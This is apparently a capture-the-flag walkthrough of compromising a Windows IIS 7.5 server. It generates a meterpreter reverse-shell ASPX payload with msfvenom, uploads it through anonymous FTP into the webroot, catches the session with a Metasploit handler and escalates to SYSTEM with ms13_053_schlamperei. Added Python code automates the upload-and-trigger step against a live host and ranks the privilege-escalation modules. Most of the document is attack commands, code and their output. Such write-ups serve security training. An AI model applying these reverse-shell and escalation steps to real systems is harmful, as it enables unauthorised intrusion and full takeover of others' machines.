Starting Nmap 7.93 ( ) at 2022-12-21 21:06 MST
Nmap scan report for
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
| 12-22-22  01:27AM               897112 r.aspx
| 12-22-22  01:17AM                 2921 rev.aspx
| 12-22-22  01:06AM                 2935 reverse.aspx
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds


Generate an ASPX payload with msfvenom. Note that windows/meterpreter_reverse_tcp (underscore) is the stageless variant, so the handler must be set to exactly the same payload name later.

msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT=4444 -f aspx > r.aspx

Upload the payload over FTP using the anonymous login nmap reported. The listing (aspnet_client, iisstart.htm, welcome.png) shows that the FTP root is the IIS webroot, so anything dropped here is served, and for .aspx compiled and executed, by the web server. rev.aspx and reverse.aspx are earlier uploads; the anonymous account cannot delete them, as the 550 below shows.

❯ ftp anonymous@
Connected to
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> put r.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
12-22-22  01:27AM               897112 r.aspx
12-22-22  01:17AM                 2921 rev.aspx
12-22-22  01:06AM                 2935 reverse.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> rm rev.aspx
550 The directory name is invalid.

Set up a multi/handler listener in Metasploit (same payload, LHOST and LPORT as the msfvenom command) and then request r.aspx over HTTP on port 80; IIS runs the page and it connects back.

msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST      yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on
[*] Meterpreter session 1 opened ( -> at 2022-12-21 21:13:22 -0700

meterpreter >
meterpreter > getuid
Server username: IIS APPPOOL\Web
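The foothold steps above (anonymous FTP upload into the IIS webroot, then an HTTP request to run the page, then cleanup of stale files), as an added Python example that is not part of the original writeup. The target host, the file name r.aspx and the stale names rev.aspx/reverse.aspx are taken from the writeup; the FTP and HTTP transports are injected so the same logic runs offline against the constructed fakes at the bottom.

```python
"""Upload a file over anonymous FTP and confirm IIS serves it from the same directory.

Added example, not code from the original writeup. Assumes the host, the payload
file name (r.aspx) and the stale file names seen in the listing; FakeFtp and
fake_http_get are constructed stand-ins so demo() runs without a target.
"""
import ftplib
import io
import urllib.error
import urllib.request


def upload_and_trigger(ftp, http_get, filename, data, cleanup=()):
    """STOR `data` as `filename`, fetch it over HTTP, try to remove `cleanup` files.

    ftp      : object exposing storbinary/nlst/delete (ftplib.FTP or a fake)
    http_get : callable(path) -> (status, body_bytes); status -1 means timeout
    Returns a dict describing what was observed.
    """
    ftp.storbinary(f"STOR {filename}", io.BytesIO(data))
    if filename not in ftp.nlst():
        raise RuntimeError(f"{filename} not visible in listing after upload")

    # If the FTP root is the IIS webroot, the file is now served (and, for
    # .aspx, compiled and executed) by the web server on port 80.
    status, body = http_get("/" + filename)

    # Earlier uploads may not be deletable: the writeup got a 550 from IIS ftpd.
    # Record them as leftovers instead of failing.
    leftovers = []
    for name in cleanup:
        try:
            ftp.delete(name)
        except ftplib.error_perm:
            leftovers.append(name)
    return {"served": status == 200, "status": status,
            "body": body, "leftovers": leftovers}


def run_against(host, payload_path="r.aspx", stale=("rev.aspx", "reverse.aspx")):
    """Wire the check to a real target (host is an assumption; not run offline)."""
    ftp = ftplib.FTP(host, timeout=10)
    ftp.login("anonymous", "anonymous@example.com")  # server asks for an e-mail as password

    def http_get(path):
        try:
            with urllib.request.urlopen(f"http://{host}{path}", timeout=10) as r:
                return r.status, r.read()
        except urllib.error.HTTPError as e:
            return e.code, b""
        except (urllib.error.URLError, OSError):
            # A reverse-shell .aspx keeps the request open; a timeout here
            # usually means it ran and the handler should now have a session.
            return -1, b""

    with open(payload_path, "rb") as f:
        data = f.read()
    try:
        return upload_and_trigger(ftp, http_get, payload_path, data, cleanup=stale)
    finally:
        ftp.quit()


class FakeFtp:
    """Constructed stand-in for ftplib.FTP mirroring the listing in the writeup."""

    def __init__(self):
        self.files = {"aspnet_client", "iisstart.htm", "welcome.png",
                      "rev.aspx", "reverse.aspx"}
        self.undeletable = {"rev.aspx"}   # reproduces the 550 seen above

    def storbinary(self, cmd, fp):
        self.files.add(cmd.split(" ", 1)[1])
        return "226 Transfer complete."

    def nlst(self):
        return sorted(self.files)

    def delete(self, name):
        if name in self.undeletable:
            raise ftplib.error_perm("550 The directory name is invalid.")
        self.files.discard(name)
        return "250 DELE command successful."


def fake_http_get(files):
    """Constructed HTTP side: serves exactly what the fake FTP root contains."""
    def get(path):
        name = path.lstrip("/")
        return (200, b"<html>served</html>") if name in files else (404, b"")
    return get


def demo():
    """Offline run with the fakes; returns the observation dict."""
    ftp = FakeFtp()
    placeholder = b'<%@ Page Language="C#" %>'   # constructed stand-in, not a payload
    return upload_and_trigger(ftp, fake_http_get(ftp.files), "r.aspx",
                              placeholder, cleanup=("rev.aspx", "reverse.aspx"))


if __name__ == "__main__":
    print(demo())
```

In demo() the upload is visible over HTTP with status 200, reverse.aspx is removed, and rev.aspx is reported as a leftover because the fake answers the same 550 the real server gave. Against a live target run_against() does the same with ftplib and urllib; with the msfvenom page in place the HTTP request will normally hang rather than return, which is the point at which the multi/handler should report a session.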

Privilege Escalation

Now run the local exploit suggester against the session.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit
 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.
 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 11  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 12  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
 13  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
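Choosing among thirteen "Yes" rows is easier if the check text is read as a confidence level. The following is an added Python example, not from the writeup or from Metasploit: it parses the suggester table (the table above is embedded as sample input), ranks "appears to be vulnerable" above "could not be validated", and skips UAC bypass modules on the assumption that the session is the IIS APPPOOL\Web service account, which has no admin token for a UAC bypass to unlock.

```python
"""Triage local_exploit_suggester output before picking a module.

Added example, not from the writeup or from Metasploit. SUGGESTER_OUTPUT is the
table shown in the writeup, embedded so the script runs offline.
"""
import re

SUGGESTER_OUTPUT = """
 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.
 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 11  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 12  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
 13  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
"""

# Table row: index, module path, Yes/No, free-text check result.
ROW = re.compile(r"^\s*\d+\s+(\S+)\s+(Yes|No)\s+(.*?)\s*$")

# Assumption: the session is a service account (IIS APPPOOL\Web) with no admin
# token, so a UAC bypass cannot elevate it and is skipped during triage.
NEEDS_ADMIN_TOKEN = {"exploit/windows/local/bypassuac_eventvwr"}


def confidence(result):
    """Map Metasploit check wording to a coarse confidence level."""
    r = result.lower()
    if "is vulnerable" in r:
        return 2        # "The target is vulnerable."
    if "appears to be vulnerable" in r:
        return 1        # "The target appears to be vulnerable."
    return 0            # detected only / "could not be validated"


def parse_suggester(text):
    """Return one dict per table row; header and separator lines are ignored."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append({"module": m.group(1),
                         "candidate": m.group(2) == "Yes",
                         "result": m.group(3)})
    return rows


def triage(rows, skip=NEEDS_ADMIN_TOKEN):
    """Return (validated, unvalidated) module lists, best candidates first."""
    usable = [r for r in rows if r["candidate"] and r["module"] not in skip]
    ranked = sorted(usable, key=lambda r: -confidence(r["result"]))  # stable
    validated = [r["module"] for r in ranked if confidence(r["result"]) > 0]
    unvalidated = [r["module"] for r in ranked if confidence(r["result"]) == 0]
    return validated, unvalidated


def triage_page_output():
    return triage(parse_suggester(SUGGESTER_OUTPUT))


if __name__ == "__main__":
    good, maybe = triage_page_output()
    print("try first:", *good, sep="\n  ")
    print("unvalidated:", *maybe, sep="\n  ")
```

On the page's table this puts ms13_053_schlamperei at the top of the validated list, with the five "could not be validated" kernel modules held back for a second pass.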

Winner winner! Start with an entry the checker actually validated ("appears to be vulnerable") rather than one it only detected: use ms13_053_schlamperei, point SESSION at session 1, set LHOST for the new stage, and run it.

msf6 exploit(windows/local/ms13_053_schlamperei) > exploit

[*] Started reverse TCP handler on
[*] Launching notepad to host the exploit...
[+] Process 2724 launched.
[*] Reflectively injecting the exploit DLL into 2724...
[*] Injecting exploit into 2724...
[*] Found winlogon.exe with PID 432
[*] Sending stage (175686 bytes) to
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Meterpreter session 2 opened ( -> at 2022-12-21 21:23:35 -0700

meterpreter > getui
[-] Unknown command: getui
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM